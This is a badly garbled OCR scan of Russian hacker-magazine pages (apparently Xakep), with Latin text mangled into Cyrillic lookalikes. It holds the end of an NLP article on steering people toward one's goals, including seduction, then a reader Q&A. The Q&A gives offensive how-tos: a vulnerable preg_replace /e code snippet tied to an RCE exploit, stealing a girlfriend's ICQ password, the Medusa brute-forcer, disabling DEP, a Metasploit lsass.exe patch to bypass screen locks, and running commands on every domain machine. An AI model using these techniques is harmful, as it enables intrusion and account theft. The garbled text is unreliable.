нотут уж ничего не поделаешь — книга, которую вполне можно назвать 
«азбукой НЛП», и которую тебе, кактоварищу интересующемуся, обяза- 
тельно нужно прочитать — Джозеф О’Коннор, Джон Сеймор, «Введение 
в нейролингвистическое программирование», содержит чуть более 500К 
символов с пробелами. Эта статья, кстати, занимаетвсего 25Ксимволов 

НЛП в общении 

Чтобы прослыть контркультурным нонконформистом, я решился на 
беспрецедентный шаг — не использовать в статье про НЛП заголовков, 
содержащихтэги «знакомиться, соблазнять, мгновенно, гарантиро- 
ванно, девушек». Шаг этот рискованный, но вполне оправданный: 
мы-то стобой знаем, что общение с противоположным полом — это 
психология общения двух личностей, которая, впрочем, затем законо- 
мерно передвигается в сферу сексологии (да-да, никакой «патологии»]. 
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Эта книга представляет собой введение и путеводитель по стране, 
известную под названием Нейролингвистическое программирование / или 
сокращенно НЛП. НЛП - это искусство и наука о совершенстве, результат 
исследования того, как выдающиеся люди в различных областях деятельности 
достигали своих выдающихся результатов . Этими коммуникативными умениями 
может овладеть каждый, кто хочет повысить свою личную и профессиональную 
эффективность . 

В этой книге описаны различные модели совершенства, которые НЛП 
построило в коммуникации, бизнесе, образовании и терапии* Наш подход 
является практическим, он приносит результаты и оказывает влияние в самых 
различных областях человеческой деятельности. 

НЛП продолжает расти и генерировать новые идеи. Мы - писатели - 
считаем, что в противоположность этому книги оказываются ограниченными и 
статическими. Каждая книга является суждением, справедливым для того 
времени, когда она была написана. Это "фотография" описываемого предмета. И 
тем не менее, нет никаких причин не делать фотографию сегодня лишь потому, 
что человек завтра станет другим. 

Джозеф О’Коннор, Джон Сеймор. Введение в нейролингвистическое программирование — эту книгу можно 
назвать«практикумом» по НЛП. Все просто, понятно и структурировано. 



Правда, если этим двум личностям в чем-то не 
очень повезет, то оно может перейти в сферу 
акушерства-гинекологии или даже дермато- 
венерологии :). 

Эффективно общаясь, ты достигаешь кон- 
кретных целей: с девушкой — отправляешься 
в койку, с коллегой — достигаешь консенсу- 
са, на рабочей встрече — достигаешь резуль- 
тата. Рассмотрим процесс НЛП-общения по 
пунктам. 

1 . Установление раппорта. Определение 
раппорта ты уже освоил, теперь дело за 
малым — рассказать о нем подробнее и, 
конечно же, избежать подводных камней в 
деле его реализации. Итак, раппорт — это 
синхронизация двух людей. У давно знако- 
мых личностей она возникает неосознан- 
но, у тебя же, каку знатного оверклокера, 
наверняка существует потребность это дело 
форсировать. Попробуем составить НЛП- 
ЧаВо по этому вопросу. 

• Подстройка по позе. С высокой степенью 
вероятности ты читал «Языктелодвижений» 
Алана Пиза и наверняка слышал отом, что 
в процессе общения очень важно отзерка- 
ливать позу собеседника. Это так. Действи- 
тельно, важно. Но не менее важно избегать 
при этом попугайства и клоунады, поскольку 
явное, брутальное копирование чужой позы 
(особенно не подтверждающееся мимикой 
и голосом] вполне способно назревающий 
раппорт обломать. Причина проста: если 
на лице у тебя написано внутреннее от- 
решенное размышление («тээк, елы-палы, 
он ковыряет в носу, какже мне это отзер- 



калить?»], развитию синхронизации это не 
способствует. Знатоки НЛП подчеркивают, 
что тренировки — самое главное. Помни, что 
абсолютная копия здесь не нужна — возмож- 
но, в томчи еле, «перекрестное отзеркалива- 
ние». Вот как все это дело описывают авторы 
«Введения в НЛП»: «Подстройка — это не 
подражание, которое заметно, преувеличен- 
но и без разбора копирует движения другого 
человека, что часто считается оскорбитель- 
ным. Вы можете подстроиться кдвижениям 
руки слабыми движениями кисти, кдвиже- 
ниям тела — ответными движениями головы. 
Это называется перекрестное отражение». 

- Подстройка по ритму дыхания. Синхронное 
дыхание — признакхорошего, глубокого 
раппорта. Синхронизировать ритм дыха- 
ния нужно с умом, если ты чувствуешь, что 
такая частота не для тебя, что она создает 
дискомфорт — забей. Душевный и телесный 
комфорт в этом деле намного важнее. 

- Подстройка по голосу — темп, громкость, 
структура речи. Изучи структуру речи собе- 
седника — насколько громко он говорит, где 

и какие делает паузы, и органично синхрони- 
зируйся. Опять же — без фанатизма. Кстати, 
«отстройка» здесь не менее важна, нежели 
настройка — упомянутые выше Джозеф 
О’Коннор и Джон Сеймор обращают внима- 
ние на тот факт, что наука плавно, без рывков 
отстраиваться от речевого контакта позволит 
тебе легко научиться завершать надо- 
евший разговор ил и телефонное общение 
без использования инвектив ной лексики. 
Что, согласись, экономит деньги на твоем 



мобильном телефоне и спасаеттвои мозги от 
закипания. 

2. Присоединение. Известный мастер 
советского НЛП, ГлебЖеглов, говорил: 
«общайся с людьми на темы, которые им ин- 
тересны». А что такого? Никто и не говорит, 
что отцы-основатели НЛП придумали всю 
науку с нуля — они ее систематизировали, 
поставили цели и задачи, собрали в кучу и 
представили на суд общественности :]. Л юди 
и сознательно, и подсознательно любяттех, 
кто похож на них — кто выглядит и говорит 
также, интересуется теми же вещами, ходит 
на те же тусовки. Л юди не любят противопо- 
ложно эмоционально настроенных собе- 
седников (грустные — веселых, веселые 
— грустных], им не нравятся собеседники, 
которые говорят исключительно о себе («ой, 
что это мы все про меня и про меня, давай 
лучше про тебя. Как те бе моя новая тачка?»], 
собеседники, которые подвергают критике 
чужие ценности. Банально? Нет, не баналь- 
но. Посмотри на окружающих: что они будут 
делать, если увидят плачущего человека? 
Хлопнут по плечу и скажут: «да е-мана, ты 
че, забей, все фигня, пойдем, зальем зенки, 
жизнь прекрасна!». У кого она прекрасна? У 
того, который плачет? Встречайте рождение 
мифа: «не надо никого успокаивать — станет 
хуже». 

Так вот, «присоединение» — это присоеди- 
нение кэмоциям, ценностям, настроению и 
текущей репрезентативной системе визави. 
Причем оно возможно только втом случае, 
если раппортуже установлен. Когда человек 
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Узнай, как скрытно и гарантированно 
управлять окружающими! 





"Прямое" видение мозгом 
с закрытыми глазами, развитие фото 
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Индивидуальный тренинг 
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Реклама от Соодіе 

Контекстная реклама отгуглеца на сайте нашего 
любимого журнала традиционно доставляет! 

чувствует, что ты находишься снимвпримерно одинаковом эмо- 
циональном состоянии (разумеется, для общения с расстроенным 
человеком не нужно плакать вместе с ним), используешь в этот мо- 
мент одну и туже репрезентативную систему — допустим, отвечаешь 
ему «кинестетическими» словами в ответ на его кинестетическое 
обращение «взвесить, почувствовать, оценить», у тебя открывается 
прямая дорога к «ведению» — то есть, при сохранении раппорта и с 
условием присоединения ты начинаешь мягко подводить человека 
к то му, что нужно тебе — изменением свое го состояния. Ведь теперь 
вы синхронизированы, и изменение состояния одного человека 
приведет к изменению состояния другого. Именно так психотерапев- 
ты выводятлюдей из состояния гнева или печали, а злые соблаз- 



нители — внушают своим жертвам амурные настроения. Кстати, в 
процессе присоединения и ведения желательно строить свою речь 
без использования частицы «не» и союза «но», так как отрицание и 
противопоставление могут препятствовать установлению раппорта. 

НЛП в лечении 

Как я говорил чуть выше, нейролингвистическое программирование 
разрабатывалось как альтернатива «традиционной» психотерапии, и 
ее отличительными особенностями должны были стать: 

• Скорость. Не «годы, проведенные на кушетке психоаналитика», а... 
иногда и двадцати минут бывает достаточно. 

• Формализованность, «алгоритмизированность». Именно поэтому 
в аббревиатуре НЛП появилась буква «П», и именно поэтому она 
интересна компьютерщикам :). 

• Прогнозируемая эффективность. Ну, мало какой метод не обещает 
нам невиданной эффективности. Так или иначе, наш бессменный 
ордена Красного знамени эксперт, врач -психиатр, специалист по 
НЛП, Трасковецкая Ирина Геннадьевна приводит конкретные при- 
меры работы метода. 

][: Ирина Геннадьевна, можно ли привести какой-нибудь понятный 
пример НЛ П-воздействия? 

И.Г.: Человек — это как собака Павлова. Есть у человека сигналь- 
ные системы, есть способы поведения. Изменяя сигналы, которые 
сопутствуют поведению, изменяем поведение. Приведем в качестве 
примера знаменитое лечение фобий. Допустим, человек боится 
собак — до дрожи ипаники.Унего есть определенный комплекс вос- 
приятия собаки: запах, вкус, телесные реакции. Изменяем состояние 
одной модальности — слуха, например. Предписываем что-то вроде: 
«представить, что перед вами — огромная собака. Начинаем петь 
гимн СССР». Все, комплекс реакции рушится, реакция изменяется 

— быстро и просто. То же самое — с каким-нибудь страхом перед на- 
чальником. Если читатель захочетубедиться в действенности этого 
приема — нет ничего проще. Попробуйте изменить один штрих в том, 
как выполняете какую-то привычную работу. Пересядьте в другое ме- 
сто, выключите или включите Моцарта, начните насвистывать арию 
Аиды — и проследите, что случится. 

- ][: Наш читатель никого не боится! Это его все боятся. Он же по- 
стоянно что-то мутит — то ломанет что-нибудь, то старый проект под- 
нимет, то стартап. Может быть, и для него что-нибудь есть? 

И. Г. Можно, например, ознакомиться со стратегией Уолта Диснея. Он 
начинал какфантазер: в одной из комнат, в одной позе. От фантазера 
принимался любой продукт в любом виде. Припомним, что он, между 
прочим, нафантазировал совершенно новыйтип мультфильма. Затем — 
продолжал как реалист: в другой комнате, в другой позе и с другим анту- 
ражем. Реалист вычеркивал из фантазий то, что не нравилось реалисту, а 
оставшееся — делал более практически понятным и детальным. Затем — 
продолжал как критик, которого интересует качество конечного результа- 
та — третья комната, третья поза, третья обстановка. И так Дисней кружил 
по всем этим позициям до тех пор, пока не получал результат, который ему 
нравился. О том, что результатэтой беготни нравился зрителям, можно не 
упоминать. Стали бы интересоваться его стратегией, если бы это было не 
так. Кстати, методика «брэйншторма» в чем-то похожа на его стратегию. 
Иначе говоря, в НЛП оценке подвергается нетолько то, что человек 
делает и думает, но и то, как он это делает и как думает, а потом — это 
«как», по желанию клиента, хитрым образом видоизменяется. 

Заключение 

Такая вот эта штука — НЛП. Методика, призванная совершить рево- 
люцию в психологии и психотерапии и стать магической серебряной 
пулей, и ставшая, в итоге, ее, психологии, частью. Человеческий 
разум — слишком многоплановая вещь, и пока философы спорят, по- 
знаваемлион впринципе.а математики — думают, можно ли создать 
единую математическую модель сознания конкретного человека, 
чтобы можно было спрогнозировать 1 00% правильное для данного 
человека вмешательство, каждый вид психотерапии будет иметь 
свою нишу. Как для доброй, так и для злой стороны силы :]. т 
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0: Какие существуют сканеры для определения 
версий различных СМ5 на основе метода срав- 
нения «отпечатков» (Лпдегргіпііпд)? 

А: Самым навороченным из таких сканеров 
является написанный на Рыбу с применением 
ЗСОеЗ ОВ «ѵѵаір» (ѴѴеЬ Арріісабоп Ріпдег 
Ргіпѣег) . 

Работаетсканер следующим образом: 

1. С удаленного веб-сервера скачиваются 
определенные файлы, различные для опре- 
деленных версий какой-либо СМ3 (например, 
Іаѵагсгірі-библ потеки, картинки); 

2. Сравниваются тсіб-чексуммы этих файлов с 
чексуммами в базе; 

3. На основе этого сравнения выдается воз- 
можная версия тестируемой СМ3. 

Пример для рЬрМуАбппіп (загружается файл 
Абетез/багкЫие огапде/ітд/Ь іпіо.рпд и 
сравнивается его чексумма): 

ѵѵаІр.гЪ --ѵегЬозе -р рЪртуасЬпіп 
ЬРРрз : / /рЬртуасітіп . ехатріе . сіе 

ѴЕКВОЗЕ: гедиезС Іог " /РЬетез/(іагкЫие_ 
огапде/ітд/Ь_іп^о .рпд" ргойисей 
"СоппесСіоп геіизесі - согтесС(2) " Іог 1 
Сішез - геСгуіпд... 

Іоипсі Ыіе Іоіісжіпд таСсЬез (ІітіРесЗ. Со 
10) : 

+ + 

рЬртуасЗтіп-2 . 1 1.9.1 296 / 299 (98.99%) 



рЬртуабшіп-2.11.9.2 295/299 (98.66%) 

рЦртуас1тіп-2 .11.9.4 295 / 299 (98.66%) 

рЪртуасЗтіп-2 . 1 1.8.1 295 / 299 (98.66%) 

рЦртуасЗтіп-2 .11.9.5 295 / 299 (98.66%) 

рЦртуасЗтіп-2 .11.8 295 / 299 (98.66%) 

рЦртуасЗтіп-2 .11.9.3 295 / 299 (98.66%) 

рЪртуайтіп-2 .11.9 295/299 (98.66%) 

рЬртуайшіп-2 .11.4 294/299 (98.33%) 

рЬртуабшіп-2.11.5.2 294/299 (98.33%) 

+ + 

Скачать программу и почитать подробности 
можно на официальном сайте ѵѵѵѵѵѵ.тѵиѵ.оп 

ѵѵаіД- 

Также хочу посоветовать неплохую статью (на 
английском языке), находящуюся по адресу 
Шр://5исигі.пеі/?раде=сІос5&1:іие=ѵѵеЬарр- 
ѵегзіоп-сіеіесііоп . В статье описывается ме- 
тод поиска различий в файлах разных версий 
любых СМ3, а также предлагается (на основе 
описанного метода) узнать версию любого 
ѴѴогбРгезз блога онлайн. Напоследок, обрати 
внимание на <Ооот Іа ѴиІпегаЬіІТу Зсаппег» 
от проекта 0ѴѴА5Р ( ѵѵѵѵѵѵ.оѵѵазр.ога/іпсіех. 
рЬр/СаІедогѵ:0ѴѴА5Р Цоотіа ѴиІпегаЬіІТѵ 
Зсаппег Ргоіесі ) и сканер уязвимостей СМ3 
О ги ра I от РагОг'а ( гагОг.пате/сІгираІзсап/ ). 

0: Слышал, что в ѵВиІІеІіп найдена возможность 
просматривать посты под «хайдом» (доступные 
для просмотра после набора определенного 




количества сообщений). Как это сделать? 

А: По информации с форума Асечки хайды на ѵВ 
можно просмотреть следующим образом: 

1. Ищем пост с хайдом; 

2. Выбираем пункт«Открыть все сообщения»у 
автора данного поста; 

3. Во «всех сообщениях» находим этот пост и 
смотрим часть поста под хайдом. 

0: Какузнать, в каком формате хранится пароль 
в БДу определенной СМ5? 

А: Неплохой списоктаких форматов и, соответс- 
твенно, способов шифрования пароля находит- 
ся на іісІеіепсе.ги/сІЫіеіпз . 

Пример: см. таблицу 

Также, многие форматы встроены в известный 
брутер РаззѵѵогбзРго ( ѵѵѵѵѵѵ.іпзісіерго.сопп/епд/ 
раззѵѵогсІзрго.зЫппІ ). Если форматхешатебе 
неизвестен, то ты всегда сможешь попросить 
помощи на форуме авторов программы [огштт 
іпзісіерго.сот . 

0: Как проще всего отлаживать рНр-скрипты? 

А: Традиционно рбр-скрипты отлаживают 
«ручками» путем вывода всех сообщений 
об ошибках (директива еггог_герогбпд 
установлена в положение Е_АЩ и расста- 
новкой есЬо/ргіпІ сообщений по всему коду 
(подробное описание ищи на ЫТрѴ/рЬріад. 
ги/сіебид ). Но эта техника пришла к нам 
прямиком из прошлого века! Так что спешу 
представить тебе замечательный отладчик 
Ехрегі Ребиддег ( рбрехрегіесіііог.сопп ). ко- 
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СМ5 



Способ шифрования 



Ѵ\1") ' , 



Р^ВВ 1.2.x 


мо5($ра5з) илиЗНА-1 


Сішск5іі_ѵер Режим 


Рервабе (ѴѴев Веререисе Оатавазе) 


□ Е5(РА55ѴѴ0Р0, $5АІ_Т ) $5АІ_Т = 5иВ5ТР(ЕМАІІ_, 0, 2) 


ВимСМ5 


5НАІ ($и5ЕРМАМЕ.$РА55) ИЛИ М05($РА55) 


ЗСРІРТЕЕИ РРЕЕ ІМА6Е НО5ТШ0 5СРІРТ 


М05($РА53) 


Бншовіі 


ЗіьѵерЗтріре 


5і_аеоСМ5 


5МР1.1.Х 


5НАІ ($и5ЕРМАМЕ.$РА55) 


5маі_і_Мііке2 


М05($РА53) 


зМеѵѵз 


5шт 2 Роримз2000 


5НА-256 


ТаисоСМЗ 


М05($РА53) 


ТікіѴѴікі 


Тшѵрие 


ТРІВіО 


Трітои СМ5 


іізеВВ 


Ѵаші_і_а 


ѵВиі_і_ЕТш2.16 


М05(мо5($РА55).$5АІ_т) 


ѵВии.ЕТшЗ.54 


ѴікшоВоаро 


М05($РА5Б) 


Ѵооооо СНАТ 


ѴѴ-Аѳора 


ѴѴевбіте Вакер 


ѴѴ0Р0РРЕ55 <=2.3.3 


ѴѴОРОРРЕ55>=2.5 


мо5($рнрввЗ) 



торый создали специально для тебя авторы 
известного редактора РНР Ехрегі ЕсЮог. 
Прога использует ОБО РНР ОеЬиддег, имеет 
комфортный интерфейс и может интегри- 
роваться с другими редакторами и ЮЕ или 
использоваться независимо. 

Особенности программы: 

• выполнение РНР скриптов в пошаговом 
режиме; 

• работа с Ьгеакроіпіз; 

• отладка по сети или на локальном компью- 
тере; 

• отслеживание значений переменных и ре- 
зультата работы скрипта; 

• поддержка ЕІТЕ-8; 

• ргобіе; 

• интеграция с другими редакторами и ЮЕ; 

• мультиязычный интерфейс; 

Найти отладчик можно на официальном сайте 

ѵѵѵѵѵѵ.апкогсі.сот . 

О: Каким образом можно отслеживать статус 
ІСО-номера? 

А: Тебе поможет замечательная программа ІСО 
МопТог[ Ьир://аѵІиб.ги/2009/1 1/27/ісд-топіІог. 
Ыті], которая создана для мониторинга статуса 
ІСО-номера (Онлайн/Оффлайн/Невидимый]. 
Прога может следить за состоянием нужного 
тебе уи на (в том числе и в свернутом в трей 
состоянии ] через заданный тобой промежуток 
времени и записывать все это дело в лог. Также, 
по этой теметебе поможет всем известный 01 Р 
с его «Всевидящим оком» :) 

0: В прошлом выпуске РАО ты писал о наиболее 
популярных СМ5 в сети. Каку них обстоят дела с 
безопасностью? 



А: Насчет уязвимостей движков из «боль- 
шой тройки» (ѴѴогсІРгезз, Огираі и 2 оо т Іа ! ) , 
я думаю, тебе уже все известно, а вот с 
немногим менее популярными СМ5 из на- 
шего «топ 1 0» все обстоит несколько иначе. 
Копаются в их коде редкие энтузиасты, 
поэтому в свободном доступе присутству- 
ют только эксплойты под старые версии. 

Тем не менее, данный фа кт открывает для 
нас огромные просторы для поиска багов. 
Например, не та к давно я нашел выполне- 
ние произвольного РНР кода в последней 
версии ТУ РОІідЫ:. Уязвимость заключается 
в небезопасном использовании модифика- 
тора «е» (если этот модификатор указан, то 
итоговое выражение будет интерпретиро- 
ваться как рбр-код, именно на этом факте 
была основана известнейшая бага в форуме 
р Ь р В В 2) в функции ргед_герІасе(] : 

./зузІет/ІіЬгагіез/СопІгоІІег.рИр 

ргоСесСес! ІипсСіоп 
ргіпДАгДісІеАзРсІі: (ВаСаЬазе_КезиІР 
$окдАгСіс1е) 

{ 

$зРгАгРіс1е = ргед_ 
геріасе ( ' /\?рсИ= [ 0-9 ] */і ' , 
$зРгАгРіс1е) ; 

... $агг8еагсЪ. = аггау 
( 

' @ (<рге . *</рге>) @Юзе 1 , 

) ; 

$аггКер1асе = аггау 
( 

1 зРг_гер1асе ( " \п" , "<Ьг />" , 



) ; 

$зСгАгРіс1е - ргед_ 
геріасе ( $агг8еагс]г, $аггКер1асе, 
$зСгАгРіс1е) | 

} 

Чтобы добраться до нужной нам функции, 
необходимо оставить подготовленный 
специальным образом комментарий в любой 
новости. Почитать о том, как сформировать 
такой комментарий, а также найти эксплойт 
ты сможешь по адресу ЫірѴ/зпіррег.ги/ 
ѵіеѵу/бЛѵро[ідЫ:-270-рЬр-сосІе-ехеси1:іоп- 
ехріоіі . 

0: Как определить, какую информацию обо мне 
передает мой браузер при заходе на какой-либо 
сайт? 

А: Если тебе лень писать свой парсер хи де- 
ров (а именнов хидерах из любого Шр-за- 
проса содержится все самое вкусное], то в 
данном вопросе поможет онлайн-утилита 
ЬирѴ/ехрІоіЕіпЛооІз/апопѵт.рЬр . 
Определяются следующие параметры: 

• ІР; 

• Юзег адепі браузера; 

• Нозіпате; 

• порт; 

• ЧаѵаЗсгірІ: включен или выключен; 

• браузер (через ЧаѵаБсгірі); 

• наличие прокси-сервера; 

• ближайший прокси; 

• передаваемая информация о юзере через 
прокси; 

• сжатие; 

• поддерживаемые языки; 

• тип соединения (только для ІЕ). 

Также нельзя забывать о простом ЧаѵаБсгірЕ 
С помощью скриптов на із можно выяснить 
многие интересные вещи отвоем компьюте- 
ре, вплотьдо разрешения экрана и версии 
05. Если тебе интересна такая информация, 
то советую потестить опенсорсную альтерна- 
тиву Ооодіе АпаІуЕсз — Ріѵѵік ( ѵѵѵѵ.ріѵѵік.огд ]. 

0: Слышал об очень высоких ценах на Зх-сим- 
вольные домены. Интересно было бы узнать об 
этом подробнее. 

А: Существует замечательный буржуйский 
сайт ЬирѴ/ЗсЬагасіег.сот . на котором вы- 
ставлены на продажу множество Зх-символь- 
ных доменов, а также приведена информа- 
ция о стоимости некоторых купленных ранее 
доменах. Приведу для примера небольшой 
список наиболее крупных покупок за пос- 
ледние годы (домен, цена, дата продажи, 
покупатель): 

ОМС. сош, $80.000, 8/20/2009 , Зесіо. 
сот; 

АМТ. сот, $100.000, 4/28/2007, Зесіо. 
сот; 

ШЗ. сот, $151.300, 2/21/2006, 
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Мопікег . сот; 

ЗЕХ.сот, $12.000.000, 1/25/2006, 
Ргіѵаке Тгапзаскіоп. 

Как видишь, цены очень и очень впечатляют, 
так что тебе есть смысл заняться киберсквот- 

ТИНГОМ :] 

0: Решил заняться доменами. Очень часто на 
домайнерских форумах встречаю обозначения 
вроде СССС и т.д. Как их расшифровать? 

А: Приведенные тобой обозначения представ- 
ляютсобой маску домена. Именно по ней оце- 
ниваются его стоимость и привлекательность. 
Итак, вотсписоктаких обозначений: 

Ь- любая буква; 

N - любая цифра; 

5 - любой СИМВОЛ; 

С - любая согласная буква; 

V- любая гласная буква. 

По ценности же различаются следующие 
классы букв: 

1 . Супер-премиум (А, Е, I, С, 5, Р, М, Б, Т) ; 

2. Премиум (А, В, С, Б, Е, Е, 6, Н, I, I, М, N. 0, Р, 

Р, 5, Т); 

3. Средние Р, К, II, V, ѴѴ); 

4. Плохие Ю,Х,Ѵ, 1 ). 

0: Забыл пароль от уина, которым пользуюсь 
на телефоне в клиенте Л тт. Как восстановить 
пароль? 

А: Помимо стандартного способа ретрива 
пароля через ѵѵѵѵѵѵ.ісд.сот/раззѵѵогсі сущес- 
твуют и другие, более интересные, способы 
(вдругты забыл еще и мыло от номера или 
тебе необходимо подсмотреть пароль своей 
подружки :]. 

Итак, первый способ: 

1 . Ищи в Гугле или на Фгит.азесЬка.ги прогу 
« I СО РаззѵѵогсІ РесаШпд» (ІРР) от от кагазЗсІ; 

2. Записывай в настройках подключения 
Лтт ІР 127.0.0.1 и выключай фичу«Безо- 
пасное подключение»; 

3. Подключайся. Прога сработает как сервер 
авторизации и выдасттебе твой ШІМ и 
пароль. 

Второй СПОСОб: 

1. Заходи на 

рЬр?зЬоѵѵ1:оріс=1 47890 и качай прогу «Лтт 
I СО РаззѵѵогсІ Ресоѵегу»; 

2. Запускай программу, жми «Ореп» и выби- 
рай ранее слитый файл .гтз от Лтт; 

3. Нажимай «Зсап» и смотри, какие пароли 
нашла программа. 

Где взять тот самый .гтз файл от джимма, 
читай на форуме тоіоіъп.ги по приведенной 
выше ссылке. 

0: Раньше для брутфорса разных сервисов ис- 
пользовал ТНС-НусІга, но утилита, увы, больше 
не развивается (по крайней мере, в паблике). 
Есть л и активные проекты, которые могут соста- 
вить здоровую конкуренцию? 

А: Рекомендую попробовать Месіиза [ ѵѵѵѵѵѵ. 
ЬоІ'из.пеСітк/тесІиза/тесІиза.ЫтІ І. кото- 
рая недавно проапгрейдилась до версии 2.0. 
Фишка проекта в возможности распаралле- 



лить задачу на нужное количество потоков, а 
также модульной структуре, благодаря кото- 
рой можно подключить плагины для подбора 
паролей в самых разных сервисах. Сейчас 
доступны модули для: АЕР, СѴ5, РТР, НТТР, 

I МАР, М5-5СИ, МуЗСИ, ЫСР (ІЧеГ/Ѵаге), ІЧІЧТР, 
РсАпуѵѵбеге, Р0РЗ, РозідгеЗСИ, гехес, гіодіп, 
гзГі, 5МВ, 5МТР (АІЛН/ѴНЕѴ), 5ІЧМР, 55Нѵ2, 
5ѴІМ, Теіпеі:, ѴтАиіЛсІ, ѴІ\ІС. 

О: Какубедиться, что ВЕР включен и использу- 
ется всеми программами? 

А: БЕР, напомню для всех, расшифровы- 
вается как Баіа Ехесибоп Ргеѵепбоп. Эта 
специальная системы защиты предотвраща- 
ет исполнения кода, который находится в об- 
ласти данных, чем самым обламывая работу 
многих сплоитов. Для того чтобы изменить 
параметры БЕРперейди в «Панели управле- 
ния -> Система вкладка Дополнительное 
-> Быстродействие Параметры -> вкладка 
Предотвращения выполнения данных». 

Все операции доступны только при наличии 
аккаунта администратора. В случае необхо- 
димости, тут же можно отключить защиту для 
какой-то конкретной программы. Еще один 
хинттого, как проще всего можно отключить 
БЕР в системе. Все делается в одну команду 
через консоль: ЬсбесІіСехе /зеі {сиггепД пх 
АІѵѵаузОІЛ Команда опять же выполняется 
только с правами админа. 

О: Как разлочить экран, заблокированный ск- 
ринсейвером без перезагрузки компьютера? 

А: Если провести предварительную неболь- 
шую подготовку, то разлочить компьютер 
можно, даже не зная пароль — просто введя 
любую белиберду. Для этого необходимо 
пропатчить процесс Ізазз.ехе в том мес- 
те, где реализована проверка пароля. С 
задачей справляется скрипт для МеіазрІоіГа 
[ геіепиезз-сосіі па .ЫоазроГ сот/201 0/02/ 
ѵѵіпбоѵѵз-ѵізіа^-іагдеіз-іюг-зсгееп.іііті ]. 
Сплоит необходимо сохранить в директорию 
зсгіріз/теіюгргеіюг в папке МеіазрІоіГа. За- 
пустив скрипт, можно быть уверенным, что в 
следующий раз, когда компьютер заблокиру- 
ется скринсейвером, ты сможешь разлочить 
системулюбым паролем. 

О: Как выполнить одну и туже команду на всех 
рабочих машинах домена? 

А: Как раз недавно узнал способ, как реали- 
зовать это без всякого дополнительного про- 
граммного обеспечения. Общий синтаксис 
следующий: 

стсі.ехе /ѵ:оп /с "ког /Е "с!е1ітз=, 
кокепз=1" %і іп ( ' сіздиегу сотрикег 
-Іітік 0 ' ) сіо зек пате=%і & зек 
пате= ! пате : ~4 ! & Команду, которую 
нужно выполнить на ! пате ! 

Фишка заключается в том, что с помощью 
команды сіздиегу можно извлечь инфор- 
мацию обо всех рабочих станций в домене, 
при этом большая часть сложной команды 




используется для того, чтобы привести под- 
робную инфу о хостах к банальному списку из 
имен станций. Адалее, имея на руках права 
администратора и зная имена всех машин в 
сети, можно удаленно выполнить команду на 
каждом из компьютеров, что мы, собственно, 
и делаем. 

О: Делаю мини-лабораторию для анализа 
подозрительных сайтов и страниц (наподобие 
тех, который вы описывали в прошлом номере). 
Подыскиваю инструмент, который может найти, 
а еще лучше вырезать зловредный код из НТМЬ- 
страницы? 

А: Идеально подойдет написанный на РиЬу 
скрипт іЗсаппег ( ізсаппег.ізесигНу.огд ). 

Тулза очень неплохо справляется с анализом 
скрытых іітате'ов, анализом сценариев на 
]аѵазсгі рі, ѵбзсгі рі и объектов асГѵех. 

0: Говорят, что если пофиксить баг, позволя- 
ющий получить в винде права системного 
пользователя (][ рассказывал о баге в статье 
«Долой Іізегіеѵеі!» прошлого номера — прим, 
редактора), то есть шанс получить систему, 
которая будет постоянно вываливаться в В5СШ. 
Как этого избежать? 

А:Такая ерунда происходит, если офици- 
альный патч накладываются на систему, в 
которой обосновалась последняя модифи- 
кация руткита ТБ55 (он же Тісізегѵ, ТББЗ или 
Аіигеоп]. Соответственно рецепт правильно- 
го апдейта простой. Перед установкой патча, 
обязательно нужно проверить винду на нали- 
чие заразы (она, кстати, отлично уживается и 
в Ѵізіа , и ѴѴіпсіоѵѵб 7). Для этого есть бесплат- 
ная тулза ТБ55 сіеапіпд Іооі ( ѵѵѵѵѵѵ.погтап. 
сот/зиррогі/зиррогі ІооІз/77201/еп ]. 

О: Как реализовать авторизацию в Ыпих'е с 
помощью флешки, телефона с включенным 
ВІиеІооІН, отпечатку пальца (модная фишка 
на новых буках) или изображению лица с веб- 
камеры? 

А: Тут поможет механизм РАМ (РІиддаЫе 
АиіЬепбсабоп МосМез], предоставляющий 
АРІ-интерфейс для реализации разныхтипов 
авторизации. Для каждого из типов исполь- 
зуется свой подключаемый модуль: скажем, 
чтобы разрешить авторизацию поустройству 
ВІиеІооіЬ (компьютер сам блокируется при 
отдалении от него), придется установить 
модуль рат_Ыие ( раскадез.депіоо.огд/ 
раскаде/зѵз-аиііі/рат Ыие І. Другие типы ав- 
торизации доступны через соответствующие 
модули: 

• рат_изб ( ратизЬ.ога ) — авторизация по 
ІЭБВ-флешке; 

• ратДщгіпІ: ( геасііѵаІесІ.пеіЛргіпіАл/ікі/Рат 
бргіпі і — авторизация по отпечатку пальца; 

• ратЛасе-аиіЬепбсабоп ( сосіе.доодіе. 
сот/р/ра т -Іа се-аиіЬепІісаІіоп ] — авториза- 
ция по изображению лица с веб-камеры. 
Настройка каждого из типов отличается друг 
отдруга, но подробные инструкции и даже 
видеомануалы легко найти на домашних 
страницах проектов. ИИ 
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Создай іоггепі- клиент для 
автоматической закачки 
нужного файла 



ТОККЕЫТ2ЕХЕ 

ѵ\/\ллл/.І:оггепІ:2ехе.сопп 

Где разместить файлы, чтобы они всегда были доступны?Так, чтобы 
не зависеть от конкретного сервера, который можетупасть, или какого- 
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г 
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Красивый хостинг 
для исходных кодов 



нибудь файлообменного сервиса, который обязательно будет на прятать 
своими ограничениями. Правильнее всего использовать распределен- 
ную систему, например, ВіГГоггепІ-сеть, но в этом случае частьлюдей 
обязательно замучаюттебя вопросом, какею пользоваться? Для того 
чтобы избежать мучительных разъяснений, можно с помощью сервиса 
ѵѵѵѵѵѵТоггеп 1 : 2 ехе.сопп создать клиентсуже включенным Тоггепі-фай- 
лом, который без лишний вопросов будет начинать закачку сразу после 
запуска. Пользователь при этом даже не будет догадываться, что файл на 
самом деле скачивается через ВИЛоггепІ-сеть. 




* №№к4_ «икй 1 т V / еь ; 4 X а адкгч тс г / №№ гйЦ ? ш ірвд ^ ТКШ - а и " 

іяіитѵміи. 



ѵѵѵѵѵѵ.разііе.огд 

Если нужно поделиться с кем-то исходниками, какими-то конфигами, 
ХМІ_-ками, дампами или просто текстовыми файлами, то лучшего 
инструмента, чем Разііе не найти. Все, что требуется - это скопипастить 
в формутекст и указать его тип (скажем, исходник на С++ или РуЛаоп]. Сер- 
вис выдаст короткий линк, перейдя по которому, любой увидит исходный 
тексте красиво подсвеченным синтаксисом. Причем во время просмотра 
можно изменить тему для отображения так, чтобы исходник выглядел 
максимально близко к просмотру через привычную среду разработки. 
Попробуй -тебе понравится. 




ѵѵѵѵѵѵ.иІІІІІутіІГсопп 



Какой самый простой способ сделать свой собственный онлайн-сер- 
вис? Да, можно легко поднять свой веб-сервер и легко хостить там свои 
